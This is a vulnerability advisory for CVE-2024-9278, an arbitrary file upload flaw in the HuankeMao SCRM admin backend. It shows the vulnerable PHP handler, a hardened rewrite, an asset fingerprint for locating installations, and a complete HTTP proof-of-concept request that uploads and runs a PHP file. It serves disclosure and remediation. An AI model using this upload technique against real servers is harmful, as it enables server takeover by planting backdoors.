[Original] (CVE-2024-9278) HuankeMao SCRM <=0.0.3 file upload vulnerability




Time: 2024-09-16 19:58:23
Author: jackieya
Visibility: Public
Severity: High
Rank: 3

CVE-2024-9278
Created: 09/27/2024 07:41 AM
Changes: 09/27/2024 07:41 AM (57)
Submitter: jackieya@wiki


Vulnerability description

HuankeMao SCRM (唤客猫SCRM) is a data-driven, fine-grained operations service system built on Enterprise WeChat, helping businesses run intelligent, simple, friendly and detailed customer operation management.

The administrator backend of HuankeMao SCRM <=0.0.3 contains an arbitrary file upload vulnerability. An attacker can use it to upload a backdoor file and thereby gain control of the server.

GitHub project: https://github.com/huankemao/huankemao-php

Asset fingerprint

body="唤客猫"


Vulnerability analysis

The vulnerability is located in the `upload_domain_verification_file` function of `app\admin\controller\v1\WxkConfig.php`:

```php
public function upload_domain_verification_file(){
    if (!isset($_FILES['domain_verification_file'])){
        response(500, '文件为空');
    }
    // No check of the file name, extension or content: the client-supplied name is
    // used directly as the destination path, relative to the web root.
    move_uploaded_file($_FILES['domain_verification_file']['tmp_name'], $_FILES['domain_verification_file']['name']);

    response(200, '操作成功', $_SERVER['HTTP_HOST'] . '/' . $_FILES['domain_verification_file']['name']);
}
```

The uploaded file is not validated here at all (neither its name nor its type is checked); it is written directly into the website root directory under the client-supplied file name.
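As an added illustration (not code from the huankemao-php project), the following is a hardened version of the handler above. It assumes the project's `response($code, $msg, $data = null)` helper exists, and uses an assumed `VERIFY_DIR` constant for the directory the verification file is served from; the name and content patterns are assumptions based on the file's purpose (a small plain-text domain verification token).

```php
<?php
// Added example (not code from the huankemao-php project): a hardened version of the
// upload handler. Assumes the project's response($code, $msg, $data = null) helper
// and an assumed VERIFY_DIR constant for the directory the file is served from.

class WxkConfigHardened
{
    // Enterprise WeChat domain verification files are small plain-text files whose
    // name is a simple token with a .txt extension, so that is all the handler accepts.
    const NAME_PATTERN    = '/^[A-Za-z0-9_\-]{1,64}\.txt$/';
    const CONTENT_PATTERN = '/^[A-Za-z0-9]{1,256}\s*$/';
    const MAX_BYTES       = 1024;

    public function upload_domain_verification_file()
    {
        $f = $_FILES['domain_verification_file'] ?? null;
        if ($f === null || $f['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($f['tmp_name'])) {
            return response(500, '文件为空');
        }

        // Never trust the client-supplied name: drop any path part, then whitelist the
        // form. The pattern excludes '/', '\' and extra dots, so neither path traversal
        // nor a double extension like x.php.txt passes, and .txt is not executed by PHP.
        $name = basename((string) $f['name']);
        if (!preg_match(self::NAME_PATTERN, $name)) {
            return response(400, 'invalid file name');
        }

        // Check size and content: the file must be a plain token, never script code.
        if ($f['size'] > self::MAX_BYTES) {
            return response(400, 'file too large');
        }
        $data = (string) file_get_contents($f['tmp_name']);
        if (!preg_match(self::CONTENT_PATTERN, $data)) {
            return response(400, 'file content is not a plain verification token');
        }

        // Write into a fixed directory (never a client-chosen path), non-executable.
        $dest = rtrim(VERIFY_DIR, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR . $name;
        if (!move_uploaded_file($f['tmp_name'], $dest)) {
            return response(500, 'save failed');
        }
        chmod($dest, 0644);

        return response(200, '操作成功', $_SERVER['HTTP_HOST'] . '/' . $name);
    }
}
```

Independently of the code fix, the web server should be configured so that files under the upload location are never handled by the PHP interpreter, which limits the impact if validation is ever bypassed.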

POC

Exploiting this vulnerability requires logging into the backend.
After logging in, click the "Settings" icon in the upper right corner of the page.


Click the "Upload verification file" button.


After uploading a txt file and intercepting the request, change the file suffix to php to obtain the following POC:

```http
POST /admin.php/upload_domain_verification_file HTTP/1.1
Host: 127.0.0.1:83
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYUNSO2a0qBTk9UVQ
Content-Length: 685

------WebKitFormBoundaryYUNSO2a0qBTk9UVQ
Content-Disposition: form-data; name="time"

1726487021
------WebKitFormBoundaryYUNSO2a0qBTk9UVQ
Content-Disposition: form-data; name="user_id"

71712684-324d-dbcc-f654-fee216e6453e
------WebKitFormBoundaryYUNSO2a0qBTk9UVQ
Content-Disposition: form-data; name="token"

fa4808a150e55b8aec0aa1bbea7438174e265464
------WebKitFormBoundaryYUNSO2a0qBTk9UVQ
Content-Disposition: form-data; name="sign"

46908fde63883cae06d059a4972809dd
------WebKitFormBoundaryYUNSO2a0qBTk9UVQ
Content-Disposition: form-data; name="domain_verification_file"; filename="1.php"
Content-Type: text/plain

<?php phpinfo();?>
------WebKitFormBoundaryYUNSO2a0qBTk9UVQ--
```

After the upload, visiting http://127.0.0.1:83/1.php successfully executes the phpinfo() code.



Review comments: none yet...